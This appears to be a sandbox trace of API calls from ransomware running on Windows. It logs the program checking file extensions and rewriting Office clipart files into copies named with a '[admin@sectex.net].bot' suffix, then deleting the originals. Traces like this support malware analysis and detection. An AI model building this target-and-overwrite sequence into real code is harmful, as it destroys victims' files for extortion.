	[0171.093] lstrlenW (lpString=".docx") returned 5
	[0171.093] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0171.093] lstrlenW (lpString=".pdf") returned 4
	[0171.093] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.094] lstrlenW (lpString=".xls") returned 4
	[0171.094] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.094] lstrlenW (lpString=".xlsx") returned 5
	[0171.094] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0171.094] lstrlenW (lpString=".ppt") returned 4
	[0171.094] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.094] lstrlenW (lpString=".zip") returned 4
	[0171.094] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.094] lstrlenW (lpString=".rar") returned 4
	[0171.094] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.094] lstrlenW (lpString=".bz2") returned 4
	[0171.094] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.094] lstrlenW (lpString=".7z") returned 3
	[0171.094] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.094] lstrlenW (lpString=".dbf") returned 4
	[0171.094] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.094] lstrlenW (lpString=".1cd") returned 4
	[0171.094] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.094] lstrlenW (lpString=".jpg") returned 4
	[0171.094] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.094] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.094] lstrlenW (lpString="J0182888.WMF") returned 12
	[0171.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.095] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=24392) returned 1
	[0171.095] CloseHandle (hObject=0x350) returned 1
	[0171.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf")) returned 0x20
	[0171.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.096] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.096] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.097] GetLastError () returned 0x0
	[0171.097] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x5f48, lpOverlapped=0x0) returned 1
	[0171.135] WriteFile (in: hFile=0x188, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x5f50, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x5f50, lpOverlapped=0x0) returned 1
	[0171.136] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.136] WriteFile (in: hFile=0x188, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.136] SetEndOfFile (hFile=0x188) returned 1
	[0171.136] CloseHandle (hObject=0x188) returned 1
	[0171.136] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.136] SetEndOfFile (hFile=0x350) returned 1
	[0171.138] CloseHandle (hObject=0x350) returned 1
	[0171.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.139] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf")) returned 1
	[0171.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.139] lstrlenW (lpString=".doc") returned 4
	[0171.139] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.139] lstrlenW (lpString=".docx") returned 5
	[0171.139] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.139] lstrlenW (lpString=".pdf") returned 4
	[0171.139] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.139] lstrlenW (lpString=".xls") returned 4
	[0171.140] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.140] lstrlenW (lpString=".xlsx") returned 5
	[0171.140] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.140] lstrlenW (lpString=".ppt") returned 4
	[0171.140] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.140] lstrlenW (lpString=".zip") returned 4
	[0171.140] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.140] lstrlenW (lpString=".rar") returned 4
	[0171.140] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.140] lstrlenW (lpString=".bz2") returned 4
	[0171.140] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.140] lstrlenW (lpString=".7z") returned 3
	[0171.140] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.140] lstrlenW (lpString=".dbf") returned 4
	[0171.140] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.140] lstrlenW (lpString=".1cd") returned 4
	[0171.140] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.140] lstrlenW (lpString=".jpg") returned 4
	[0171.140] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.140] lstrlenW (lpString=".doc") returned 4
	[0171.140] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.140] lstrlenW (lpString=".docx") returned 5
	[0171.140] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.140] lstrlenW (lpString=".pdf") returned 4
	[0171.140] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.140] lstrlenW (lpString=".xls") returned 4
	[0171.140] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.141] lstrlenW (lpString=".xlsx") returned 5
	[0171.141] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.141] lstrlenW (lpString=".ppt") returned 4
	[0171.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.141] lstrlenW (lpString=".zip") returned 4
	[0171.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.141] lstrlenW (lpString=".rar") returned 4
	[0171.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.141] lstrlenW (lpString=".bz2") returned 4
	[0171.141] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.141] lstrlenW (lpString=".7z") returned 3
	[0171.141] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.141] lstrlenW (lpString=".dbf") returned 4
	[0171.141] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.141] lstrlenW (lpString=".1cd") returned 4
	[0171.141] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 63
	[0171.141] lstrlenW (lpString=".jpg") returned 4
	[0171.141] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.141] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.141] lstrlenW (lpString="J0182946.WMF") returned 12
	[0171.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.142] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=16082) returned 1
	[0171.142] CloseHandle (hObject=0x350) returned 1
	[0171.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf")) returned 0x20
	[0171.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.142] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.142] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.143] GetLastError () returned 0x0
	[0171.143] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3ed2, lpOverlapped=0x0) returned 1
	[0171.188] WriteFile (in: hFile=0x188, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3ee0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3ee0, lpOverlapped=0x0) returned 1
	[0171.189] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.189] WriteFile (in: hFile=0x188, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.189] SetEndOfFile (hFile=0x188) returned 1
	[0171.189] CloseHandle (hObject=0x188) returned 1
	[0171.189] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.189] SetEndOfFile (hFile=0x350) returned 1
	[0171.191] CloseHandle (hObject=0x350) returned 1
	[0171.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.204] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf")) returned 1
	[0171.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.287] lstrlenW (lpString=".doc") returned 4
	[0171.287] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.287] lstrlenW (lpString=".docx") returned 5
	[0171.287] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.287] lstrlenW (lpString=".pdf") returned 4
	[0171.287] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.287] lstrlenW (lpString=".xls") returned 4
	[0171.287] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.287] lstrlenW (lpString=".xlsx") returned 5
	[0171.287] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.287] lstrlenW (lpString=".ppt") returned 4
	[0171.287] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.287] lstrlenW (lpString=".zip") returned 4
	[0171.287] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.287] lstrlenW (lpString=".rar") returned 4
	[0171.287] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.287] lstrlenW (lpString=".bz2") returned 4
	[0171.287] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.287] lstrlenW (lpString=".7z") returned 3
	[0171.287] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.288] lstrlenW (lpString=".dbf") returned 4
	[0171.288] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.288] lstrlenW (lpString=".1cd") returned 4
	[0171.288] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.290] lstrlenW (lpString=".jpg") returned 4
	[0171.290] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.290] lstrlenW (lpString=".doc") returned 4
	[0171.290] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.290] lstrlenW (lpString=".docx") returned 5
	[0171.290] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.290] lstrlenW (lpString=".pdf") returned 4
	[0171.290] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.290] lstrlenW (lpString=".xls") returned 4
	[0171.290] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.290] lstrlenW (lpString=".xlsx") returned 5
	[0171.290] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.290] lstrlenW (lpString=".ppt") returned 4
	[0171.290] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.291] lstrlenW (lpString=".zip") returned 4
	[0171.291] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.291] lstrlenW (lpString=".rar") returned 4
	[0171.291] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.291] lstrlenW (lpString=".bz2") returned 4
	[0171.291] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.291] lstrlenW (lpString=".7z") returned 3
	[0171.291] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.302] lstrlenW (lpString=".dbf") returned 4
	[0171.302] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.302] lstrlenW (lpString=".1cd") returned 4
	[0171.302] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 63
	[0171.302] lstrlenW (lpString=".jpg") returned 4
	[0171.302] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.303] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.311] lstrlenW (lpString="J0185670.WMF") returned 12
	[0171.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.326] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=7304) returned 1
	[0171.326] CloseHandle (hObject=0x350) returned 1
	[0171.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf")) returned 0x20
	[0171.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.326] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.326] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.327] GetLastError () returned 0x0
	[0171.327] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1c88, lpOverlapped=0x0) returned 1
	[0171.329] WriteFile (in: hFile=0x124, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1c90, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1c90, lpOverlapped=0x0) returned 1
	[0171.330] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.330] WriteFile (in: hFile=0x124, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.330] SetEndOfFile (hFile=0x124) returned 1
	[0171.330] CloseHandle (hObject=0x124) returned 1
	[0171.330] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.330] SetEndOfFile (hFile=0x350) returned 1
	[0171.332] CloseHandle (hObject=0x350) returned 1
	[0171.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf")) returned 1
	[0171.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.339] lstrlenW (lpString=".doc") returned 4
	[0171.339] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.339] lstrlenW (lpString=".docx") returned 5
	[0171.339] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.339] lstrlenW (lpString=".pdf") returned 4
	[0171.339] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.339] lstrlenW (lpString=".xls") returned 4
	[0171.339] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.339] lstrlenW (lpString=".xlsx") returned 5
	[0171.339] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.339] lstrlenW (lpString=".ppt") returned 4
	[0171.339] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.339] lstrlenW (lpString=".zip") returned 4
	[0171.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.339] lstrlenW (lpString=".rar") returned 4
	[0171.339] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.339] lstrlenW (lpString=".bz2") returned 4
	[0171.339] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.339] lstrlenW (lpString=".7z") returned 3
	[0171.340] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.340] lstrlenW (lpString=".dbf") returned 4
	[0171.340] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.340] lstrlenW (lpString=".1cd") returned 4
	[0171.340] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.340] lstrlenW (lpString=".jpg") returned 4
	[0171.340] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.340] lstrlenW (lpString=".doc") returned 4
	[0171.340] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.340] lstrlenW (lpString=".docx") returned 5
	[0171.340] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.340] lstrlenW (lpString=".pdf") returned 4
	[0171.340] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.340] lstrlenW (lpString=".xls") returned 4
	[0171.340] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.340] lstrlenW (lpString=".xlsx") returned 5
	[0171.340] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.340] lstrlenW (lpString=".ppt") returned 4
